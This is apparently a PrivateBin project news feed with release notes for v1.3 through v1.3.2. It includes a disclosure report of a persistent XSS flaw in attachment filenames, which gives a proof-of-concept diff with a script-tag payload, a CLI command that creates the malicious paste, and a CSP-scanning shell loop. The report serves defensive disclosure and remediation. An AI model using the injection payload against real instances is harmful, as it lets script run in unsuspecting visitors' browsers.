&lt;ul&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: bootstrap 3.4.1, DOMpurify 2.0.7, jQuery 3.4.1, kjua 0.6.0, Showdown 1.9.1 &amp;amp; SJCL 1.0.8&lt;/li&gt;
&lt;li&gt;FIXED: HTML injection via unescaped attachment filename (#554)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next regular release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Vulnerability Report: Persistent XSS vulnerability in filename of attached file in PrivateBin</title><link href="https://privatebin.info/reports/vulnerability-2020-01-11.html" rel="alternate"/><published>2020-01-11T15:00:00+01:00</published><updated>2020-01-11T15:00:00+01:00</updated><author><name>rugk</name></author><id>tag:privatebin.info,2020-01-11:/reports/vulnerability-2020-01-11.html</id><summary type="html">&lt;p&gt;On 25th of December 2019 an XSS vulnerability has been discovered, which has been fixed in &lt;a href="https://privatebin.info/news/v1.3.2-v1.2.2-release.html"&gt;PrivateBin v1.3.2 &amp;amp; v1.2.2&lt;/a&gt;.&lt;/p&gt;</summary><content type="html">&lt;p&gt;On 24th of December 2019 one of the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/tst/README.md#property-based-unit-testing"&gt;property based unit tests&lt;/a&gt; reported a &lt;a href="https://travis-ci.org/PrivateBin/PrivateBin/jobs/629180605#L782"&gt;failure&lt;/a&gt;. Upon investigation, &lt;a href="https://github.com/elrido"&gt;@elrido&lt;/a&gt; discovered that the failure was due to unescaped HTML, which allowed the user provided attachment file name to inject HTML under certain conditions leading to a persistent &lt;a href="https://en.wikipedia.org/wiki/Cross-site_scripting"&gt;Cross-site scripting (XSS)&lt;/a&gt; vulnerability. After committing an &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/8d0ac336d23cd8c98e71d5f21cdadcae9c8a26e6"&gt;initial fix&lt;/a&gt; to the master branch, the &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/554"&gt;issue was reported&lt;/a&gt; on 25th of December. Vulnerability write-up done by &lt;a href="https://github.com/rugk"&gt;@rugk&lt;/a&gt; and &lt;a href="https://github.com/elrido"&gt;@elrido&lt;/a&gt;.&lt;br&gt;
The vulnerability has been fixed in &lt;a href="https://privatebin.info/news/v1.3.2-v1.2.2-release.html"&gt;PrivateBin v1.3.2 &amp;amp; v1.2.2&lt;/a&gt;. Admins are urged to upgrade to these versions to protect the affected users.&lt;/p&gt;
&lt;h2&gt;Affected versions&lt;/h2&gt;
&lt;p&gt;Any PrivateBin version since 1.2.&lt;/p&gt;
&lt;h2&gt;Conditions&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;The configuration setting &lt;code&gt;fileupload&lt;/code&gt; has to be enabled, as 1.3 displays an error when trying to open a paste with attachment.&lt;/li&gt;
&lt;li&gt;The CSP header rules don't get applied. For example:&lt;ul&gt;
&lt;li&gt;They are unsupported or disabled in the visitors browser.&lt;/li&gt;
&lt;li&gt;They are filtered out by a some proxy server at the server or client side.&lt;/li&gt;
&lt;li&gt;The header is disabled/commented in the PHP-logic.&lt;/li&gt;
&lt;li&gt;The rules have been relaxed in the &lt;code&gt;cspheader&lt;/code&gt; configuration setting.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;A paste with a malicious filename is created.&lt;/li&gt;
&lt;li&gt;A visitor of that paste clicks on the "Clone" button.&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Proof of concept&lt;/h2&gt;
&lt;p&gt;The following method is just one possibility to exploit this issue and is provided as a proof of concept with steps to reproduce the issue. To avoid having to create an actual file with a rogue filename, one could use the &lt;a href="https://github.com/r4sas/PBinCLI/"&gt;Python CLI client for PrivateBin&lt;/a&gt; and &lt;a href="https://github.com/r4sas/PBinCLI/blob/682b47fbd3e24a8a53c3b484ba896a5dbc85cda2/pbincli/format.py#L56"&gt;edit line 56 in &lt;code&gt;format.py&lt;/code&gt;&lt;/a&gt; as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="gd"&gt;-        self._attachment_name = path_leaf(path)&lt;/span&gt;
&lt;span class="gi"&gt;+        self._attachment_name = &amp;#39;&amp;lt;script&amp;gt;alert(&amp;quot;☹️&amp;quot;);//&amp;lt;a&amp;#39;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;The paste then can be created on a vulnerable instance:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;$&lt;span class="w"&gt; &lt;/span&gt;python&lt;span class="w"&gt; &lt;/span&gt;pbincli/cli.py&lt;span class="w"&gt; &lt;/span&gt;send&lt;span class="w"&gt; &lt;/span&gt;-t&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;-f&lt;span class="w"&gt; &lt;/span&gt;/dev/null&lt;span class="w"&gt; &lt;/span&gt;-s&lt;span class="w"&gt; &lt;/span&gt;https://privatebin.net/
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;Visiting the created paste on a vulnerable instance, with &lt;code&gt;fileupload&lt;/code&gt; enabled and the CSP header weakened or disabled, and clicking the clone button will insert the HTML unescaped. In the above example, a pop-up would appear, when the script is executed.&lt;/p&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;On a vulnerable site pastes with malicious filenames can be created and users visiting these could inadvertently trigger the code execution when they click the "Clone" button. They could be instigated to do so via social engineering, like a paste text suggesting to "clone and share" the paste in question.&lt;/p&gt;
&lt;p&gt;The attached file itself doesn't have to be empty and could be an image or document that would still be displayed inline as usual. The execution of the script triggered by clicking on the "Clone" button may occur silently in the background without showing any noticeable signs in browser. It may for instance be used to track visitors, start drive-by-downloads or similar. While we focus on script injection here, as it is the easiest exploit vector, it has to be said that anything else can be injected like CSS, images, videos, although the default CSP will block inline CSS and images, e.g.&lt;/p&gt;
&lt;p&gt;On first visit, the filename isn't visible and is properly escaped when inserted into the download attribute. Only when clicking the "Download attachment" link would open a file save dialog with an odd name pre-filled, although browsers will convert illegal characters into valid ones, so it may not be identical to the one provided. Only when the "Clone" button has been clicked and after the exploit has already been triggered, the filename gets displayed. Note that an attacker can of course prevent this indicator of compromise to be shown and e.g. change the displayed text or obfuscate the filename by starting it with something harmless, like &lt;code&gt;image.png&lt;/code&gt;, before opening the HTML tag.&lt;/p&gt;
&lt;h3&gt;Impact restrictions&lt;/h3&gt;
&lt;p&gt;The impact is mitigated by the fact that the vulnerability is, as far as our investigation concluded, paste-specific, i.e. opening a vulnerable paste can only compromise this one paste and no other pastes.&lt;/p&gt;
&lt;p&gt;Furthermore, as stated before, the impact is mitigated by the fact that we deploy a strong &lt;a href="https://content-security-policy.com/"&gt;CSP&lt;/a&gt; that, by default, does not allow inline JS or other potentially easy methods that would allow an easy exploitation of the vulnerability.&lt;br&gt;
That said, we have to make users aware, that there may always be tricks to bypass such a CSP and the simple injection of HTML tags, e.g. destroying, faking or somehow phishing an HTML page does always remain a possibility.&lt;/p&gt;
&lt;p&gt;As such, we treat this as a security vulnerability with medium severity. It is critical on it's own, but we believe that the deployed security mechanisms should prevent an exploit in practice in most cases.&lt;/p&gt;
&lt;h2&gt;Real-life impact&lt;/h2&gt;
&lt;p&gt;We checked all instances listed in the &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/PrivateBin-Directory"&gt;PrivateBin directory in the Wiki&lt;/a&gt; and didn't find any 1.1, 1.2 or 1.3 instances that had the CSP headers disabled or in a state we know to be vulnerable. We used the following script, that may be adapted to check the CSP headers of any single instance:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="k"&gt;for&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;URL&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;in&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;$(&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;curl&lt;span class="w"&gt; &lt;/span&gt;-s&lt;span class="w"&gt; &lt;/span&gt;https://raw.githubusercontent.com/wiki/PrivateBin/PrivateBin/PrivateBin-Directory.md&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;grep&lt;span class="w"&gt; &lt;/span&gt;-Po&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;^http.*?(?= )&amp;#39;&lt;/span&gt;
&lt;span class="k"&gt;)&lt;/span&gt;
&lt;span class="k"&gt;do&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;-n&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&lt;/span&gt;&lt;span class="nv"&gt;$URL&lt;/span&gt;&lt;span class="s2"&gt;: &amp;quot;&lt;/span&gt;
&lt;span class="w"&gt;    &lt;/span&gt;curl&lt;span class="w"&gt; &lt;/span&gt;-sLI&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nv"&gt;$URL&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="p"&gt;|&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;grep&lt;span class="w"&gt; &lt;/span&gt;-Poi&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;content-security-policy.*script-src.?\K.*?(?=;)&amp;#39;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;||&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nb"&gt;echo&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;No CSP detected!&amp;#39;&lt;/span&gt;
&lt;span class="k"&gt;done&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;Some of the above sites do offer file uploads. On these instances, it is still possible that a visitor could have CSP support disabled in their browser, i.e. via a transparent proxy at their internet uplink or due to a browser plugin or some other locally installed, misguided security solution.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Important:&lt;/strong&gt; This scan is only a cursory check and &lt;em&gt;must not&lt;/em&gt; be taken as a security analysis of any means! You are always responsible for the security of your own instance. Please do check it manually!&lt;/p&gt;
&lt;h2&gt;Mitigation&lt;/h2&gt;
&lt;p&gt;As server administrators can't detect if a paste contains file attachments at all (apart from their size) in version 1.3 and due to the encrypted filename in older versions, as well as the risk for clients that don't apply the CSP settings, we urge them to upgrade to versions 1.3.2 or 1.2.2.&lt;/p&gt;
&lt;p&gt;If you use v1.3, you could disable the &lt;code&gt;fileupload&lt;/code&gt; setting to prevent pastes from getting displayed that may contain this vulnerability. Note that this will break all existing pastes with uploads, however, so we do &lt;em&gt;not&lt;/em&gt; recommend this, but advise you to upgrade to a fixed version instead.&lt;/p&gt;
&lt;h2&gt;Further information&lt;/h2&gt;
&lt;p&gt;We want to make potential third-party client authors aware of this vulnerability and urge them to double-check their implementations. If they develop a client that displays untrusted foreign data from a paste in a HTML site, please make sure to escape it to prevent XSS attacks. Such attacks can only be prevented when the paste is displayed, a mitigation when a paste is created is pointless, as a different client can be used during creation.&lt;/p&gt;
&lt;p&gt;We do also acknowledge and want to highlight the benefit of the CSP, which has first been &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/10"&gt;introduced in PrivateBin v1.0&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;However, we want to make you again aware that a whitelist-based CSP as we use, may &lt;a href="https://csp.withgoogle.com/docs/faq.html#problems-with-whitelists"&gt;sometimes still be bypassed&lt;/a&gt;, e.g. if you host a copy of the Angular library on the same domain as your PrivateBin instance.
We are aware of that and &lt;a href="https://github.com/PrivateBin/PrivateBin/issues/108"&gt;do consider&lt;/a&gt; upgrading to a stronger CSP in the future.&lt;/p&gt;
&lt;h3&gt;Issue discovery&lt;/h3&gt;
&lt;p&gt;While it is satisfying that our hard work on introducing unit tests has payed off in the discovery and mitigation of this vulnerability, it does also show a limitation of unit testing. A third party doing a code review would have certainly focused on how the project handles user provided input and may have discovered this much quicker.&lt;/p&gt;
&lt;p&gt;The discovery wasn't due to the unit test checking for HTML input to get properly escaped, on the contrary, the test assumed input would not be changed. So other instances of HTML tags generated would have happily passed the test. Only when the test generated a fragment of a link (&lt;code&gt;&amp;lt;a&lt;/code&gt;) it failed, because the DOM silently removed it when it inserted the string, as links within links aren't allowed. While the test was written to throw arbitrary strings at the &lt;code&gt;AttachmentViewer.moveAttachmentTo()&lt;/code&gt; method, the test would only check that these got inserted into the DOM unchanged, oblivious of their potential significance when interpreted as HTML.&lt;/p&gt;
&lt;p&gt;The &lt;a href="https://github.com/PrivateBin/PrivateBin/commit/39860dfdc434c00d18342b4fb3bc6f5d0960030d"&gt;test had been introduced&lt;/a&gt; on December 3rd, 2017, 570 commits ago. Every commit on master and in PRs since introduction in that commit triggers these tests to run for every supported PHP version. Additional test cycles get run on developers local environments during working on commits. Hence the test suite must have run a few thousand times, testing 100 random strings each time. And only after more then 2 years a string containing &lt;code&gt;&amp;lt;a&lt;/code&gt; got generated, triggered the error condition and 22 shrinks later the smallest failing test case was presented as:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="nt"&gt;Failed&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;after&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;65&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;tests&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;and&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;22&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;shrinks&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;rngState&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;8b8f0d4ec2a67139b5&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="nt"&gt;Counterexample&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;image/png&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;\u0000&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;lt;a&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;Discussion about a potential problem with that code, &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/508#commitcomment-34943221"&gt;did spark last September&lt;/a&gt;, when the vulnerable code part was changed to the one before before the current fix, but was &lt;a href="https://github.com/PrivateBin/PrivateBin/pull/508#commitcomment-34944396"&gt;incorrectly judged&lt;/a&gt; as not being a problem, because all of our translation strings are hardcoded. The fact that we do actually add some untrusted user-provided content, wasn't considered at that point.&lt;/p&gt;
&lt;p&gt;It should also be mentioned, that the coverage report released for version 1.3.1 did highlight the line that caused this vulnerability as not being covered during testing:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Coverage report for version 1.3.1 showing missing test coverage for line causing vulnerability" src="https://privatebin.info/img/vulnerability-2020-01-11/coverage.png"&gt;&lt;/p&gt;
&lt;p&gt;So, in conclusion, it is great to have all of these tools at our disposal, but the code quality would benefit a lot more from having more eyeballs and brains on it.&lt;/p&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;2019-12-24 – Property based unit test fails in a commit pushed to a PR.&lt;/li&gt;
&lt;li&gt;2019-12-25 – Issue investigated, preliminary patch and issue description published.&lt;/li&gt;
&lt;li&gt;2019-12-30 – Further investigations, proof-of-concept exploit demonstrated on a vulnerable test instance.&lt;/li&gt;
&lt;li&gt;2020-01-03 – Discussed broader mitigation of user provided content injections, reviewed other possible cases.&lt;/li&gt;
&lt;li&gt;2020-01-04 – Published a second patch based on review, escapes HTML in translation.&lt;/li&gt;
&lt;li&gt;2020-01-05 – Started writing vulnerability report.&lt;/li&gt;
&lt;li&gt;2020-01-07 – Backported fix for 1.2.1.&lt;/li&gt;
&lt;li&gt;2020-01-11 – &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/tag/1.3.2"&gt;Release published&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;2020-01-11 – Vulnerability details published.&lt;/li&gt;
&lt;/ul&gt;</content><category term="Reports"/><category term="PrivateBin"/><category term="Security"/></entry><entry><title>Release v1.3.1 - Improve error messages for unsupported browsers</title><link href="https://privatebin.info/news/v1.3.1-release.html" rel="alternate"/><published>2019-09-22T21:30:00+02:00</published><updated>2019-09-22T21:30:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2019-09-22:/news/v1.3.1-release.html</id><summary type="html">&lt;p&gt;This release improves the display of appropriate errors for unsupported browsers/configurations.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release improves the display of appropriate errors for unsupported browsers/configurations.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Since the release of version 1.3 only two months ago we received reports on a surprising number of corner cases with certain browser versions and protocols in which the new release didn't work, while 1.2.1 still did. The release addresses most of these or at least aims to provide a meaningful error message with hints what the user may do to avoid these (switching to HTTPS, using a different browser or being limited to partial functionality).&lt;/p&gt;
&lt;p&gt;We also have been provided with a Bulgarian translation and several improvements to the bootstrap template, cloning pastes and the drap &amp;amp; drop file upload. The URL shortener now also supports JSON APIs and the default size limit was increased to 10 MiB.&lt;/p&gt;
&lt;p&gt;Before the 1.3 release we had tested mainly in Firefox and Chrome, but none of the core developers had easy access to Windows based browsers (Edge, IE) or Mac (Safari). We also missed that Chrome disables the webcrypto API used in 1.3 to replace the SJCL cryptographic library, when accessing the site via HTTP. It didn't do this in our local testing environments, as localhost is considered safe by it, even when not accessed via HTTPS. Other quirks discovered were issues when accessing PrivateBin via Tor and i2p networks. The Torbrowser disables webassembly due to security concerns, which prevented these clients to create or read pastes.&lt;/p&gt;
&lt;p&gt;To facilitate testing of such quirks and having access to more browsers versions, we applied for a sponsored browserstack account. This helped us improving the browser feature detection. In particular the following cases got covered:
- When a modern browser has webassembly disabled (i.e. for security), it displays a warning, but still can create and read uncompressed pastes, just not open compressed ones.
- Browsers with a lack for webcrypto API on an HTTP site get suggested to switch to HTTPS (requires support by the server).
- Browsers with a lack for webcrypto API, async or ES6 support get an error requesting to switch to a modern browser.
- Internet Explorer remains unsupported, but now get an appropriate error requesting to switch to a modern browser.&lt;/p&gt;
&lt;h2&gt;Benefits of switching to the new release&lt;/h2&gt;
&lt;p&gt;We recommend to upgrade 1.3 instances to improve the support for Chrome and older browsers get more appropriate error messages.&lt;/p&gt;
&lt;h2&gt;Update procedure&lt;/h2&gt;
&lt;p&gt;As usual, you can &lt;a href="https://github.com/PrivateBin/PrivateBin/releases/latest"&gt;download the archive&lt;/a&gt; for a manual upgrade and can find more details in the &lt;a href="https://github.com/PrivateBin/PrivateBin/blob/master/doc/Installation.md#installation"&gt;installation instructions&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;We also offer a &lt;a href="https://hub.docker.com/r/privatebin/nginx-fpm-alpine/"&gt;Docker container&lt;/a&gt; that includes the recommended secure setup with the non-essential files and data outside of the web servers document root.&lt;/p&gt;
&lt;p&gt;The default size limit got increased from 2 to 10 MiB. If you didn't configure a custom size, you may have to &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Configuration#sizelimit"&gt;adjust your PHP and webserver&lt;/a&gt; settings to be able to use the new limit to the full extent.&lt;/p&gt;
&lt;p&gt;If you use the MySQL database backend and don't allow the PrivateBin use to ALTER TABLES, you have to manually change one columns type and UPDATE the database version (replace "prefix_" with your own table prefix, if used):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;code&gt;&lt;span class="k"&gt;ALTER&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;TABLE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;prefix_paste&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;MODIFY&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;COLUMN&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;data&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;MEDIUMBLOB&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;UPDATE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;prefix_config&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;SET&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;1.3.1&amp;quot;&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="k"&gt;WHERE&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="n"&gt;id&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="ss"&gt;&amp;quot;VERSION&amp;quot;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;

&lt;p&gt;PostgreSQL and SQLite don't require this change.&lt;/p&gt;
&lt;h2&gt;Changes since version 1.3&lt;/h2&gt;
&lt;ul&gt;
&lt;li&gt;ADDED: Translation for Bulgarian (#455)&lt;/li&gt;
&lt;li&gt;CHANGED: Improved mobile UI - obscured send button and hard to click shortener button (#477)&lt;/li&gt;
&lt;li&gt;CHANGED: Enhanced URL shortener integration (#479)&lt;/li&gt;
&lt;li&gt;CHANGED: Improved file upload drag &amp;amp; drop UI (#317)&lt;/li&gt;
&lt;li&gt;CHANGED: Increased default size limit from 2 to 10 MiB, switch data from BLOB to MEDIUMBLOB in MySQL (#458)&lt;/li&gt;
&lt;li&gt;CHANGED: Upgrading libraries to: DOMpurify 2.0.1&lt;/li&gt;
&lt;li&gt;FIXED: Enabling browsers without WASM to create pastes and read uncompressed ones (#454)&lt;/li&gt;
&lt;li&gt;FIXED: Cloning related issues (#489, #491, #493, #494)&lt;/li&gt;
&lt;li&gt;FIXED: Enable file operation only when editing (#497) &lt;/li&gt;
&lt;li&gt;FIXED: Clicking 'New' on a previously submitted paste does not blank address bar (#354)&lt;/li&gt;
&lt;li&gt;FIXED: Clear address bar when create new paste from existing paste (#479)&lt;/li&gt;
&lt;li&gt;FIXED: Discussion section not hiding when new/clone paste is clicked on (#484)&lt;/li&gt;
&lt;li&gt;FIXED: Showdown.js error when posting svg qrcode (#485)&lt;/li&gt;
&lt;li&gt;FIXED: Failed to handle the case where user cancelled attachment selection properly (#487)&lt;/li&gt;
&lt;li&gt;FIXED: Displaying the appropriate errors in older browsers (#508)&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Help wanted &amp;amp; greatly appreciated&lt;/h2&gt;
&lt;p&gt;Apart from the large tasks that require deeper insight and time, there are also &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?q=is%3Aopen+is%3Aissue+label%3A%22help+wanted%22"&gt;smaller issues were help is wanted&lt;/a&gt;, topics &lt;a href="https://github.com/PrivateBin/PrivateBin/issues?utf8=%E2%9C%93&amp;amp;q=is%3Aopen+is%3Aissue+label%3A%22discuss+me%22+"&gt;open to debate&lt;/a&gt; and of course many languages that still remain to be &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Translation"&gt;translated&lt;/a&gt;. We are also still looking for additional long term maintainers among our frequent issue helpers.&lt;/p&gt;
&lt;p&gt;If you are interested in helping with any of these points, we have prepared a &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Development"&gt;development guide&lt;/a&gt; including design goals, code structure and tools that should get you started.&lt;/p&gt;
&lt;h2&gt;Plans for future releases&lt;/h2&gt;
&lt;p&gt;The next release will focus on &lt;a href="https://github.com/PrivateBin/PrivateBin/milestone/6"&gt;user interface improvements&lt;/a&gt;.&lt;/p&gt;</content><category term="News"/><category term="PrivateBin"/><category term="Release"/></entry><entry><title>Release v1.3 - Fixing mangled URLs, switching encryption &amp; compression libraries</title><link href="https://privatebin.info/news/v1.3-release.html" rel="alternate"/><published>2019-07-09T18:28:00+02:00</published><updated>2019-07-09T18:28:00+02:00</updated><author><name>El RIDO</name></author><id>tag:privatebin.info,2019-07-09:/news/v1.3-release.html</id><summary type="html">&lt;p&gt;This release switches the used encryption and compression libraries and addresses several problems with mangled URLs and pastes.&lt;/p&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;This release switches the used encryption and compression libraries and addresses several problems with mangled URLs and pastes.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;We fixed several issues in this release. We now tell Chrome not to send the whole page, including the decrypted text, to it's translation services. Thanks to the use of blob instead of data URI's, Chrome can now deal with attachments larger then 2 MiB. The raw text mode escapes HTML correctly again (a regression introduced in 1.2). PrivateBin can now handle URLs mangled by Facebook.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Translations&lt;/em&gt; for Czech has been added since the last release.&lt;/p&gt;
&lt;p&gt;We &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Threat-Model"&gt;threat modeled&lt;/a&gt; the application in preparation for the changes in the API, JSON format and encryption.&lt;/p&gt;
&lt;p&gt;The main change of this release was the switch from the SJCL and rawdeflate JavaScript libraries to the browser integrated WebCrypto API and zlib C library (via WebAssembly) as well as various modernizations of our use of JavaScript. We still fully support reading older pastes and comments, but newly generated pastes use a different, more efficient and flexible format. Some of these changes lead to us dropping the support for Internet Explorer and we suggest to use Edge instead, if no other modern browser is available (see Appendix A below).&lt;/p&gt;
&lt;p&gt;The change to &lt;em&gt;WebCrypto API&lt;/em&gt; means that the cryptographic functions are now handled by the browser integrated libraries instead of code that has to be transferred from the webserver to the client. While this can't prevent a malicious party to inject logic to extract the key or decrypted contents, it does increase the trust users can have in the cryptographic functionality of PrivateBin as well as speed up both initial page load as well as the en/decryption itself.&lt;/p&gt;
&lt;p&gt;Over the years we encountered several cases where the &lt;em&gt;deflate implementation&lt;/em&gt; used in the rawdeflate JavaScript library produced results that couldn't be decompressed by itself or other deflate implementation. While the latter mainly affected &lt;a href="https://github.com/PrivateBin/PrivateBin/wiki/Third-party-clients"&gt;third-party CLI clients&lt;/a&gt;, the first lead to pastes that couldn't be read even by PrivateBin itself. We had initially planned to use the pako JavaScript library, but during implementation of the new format found that the zlib C library used in most other languages for deflate support can be used in JavaScript as well, via compilation into WebAssembly. This is a very stable library with no currently known bugs and even performs better then pako.&lt;/p&gt;
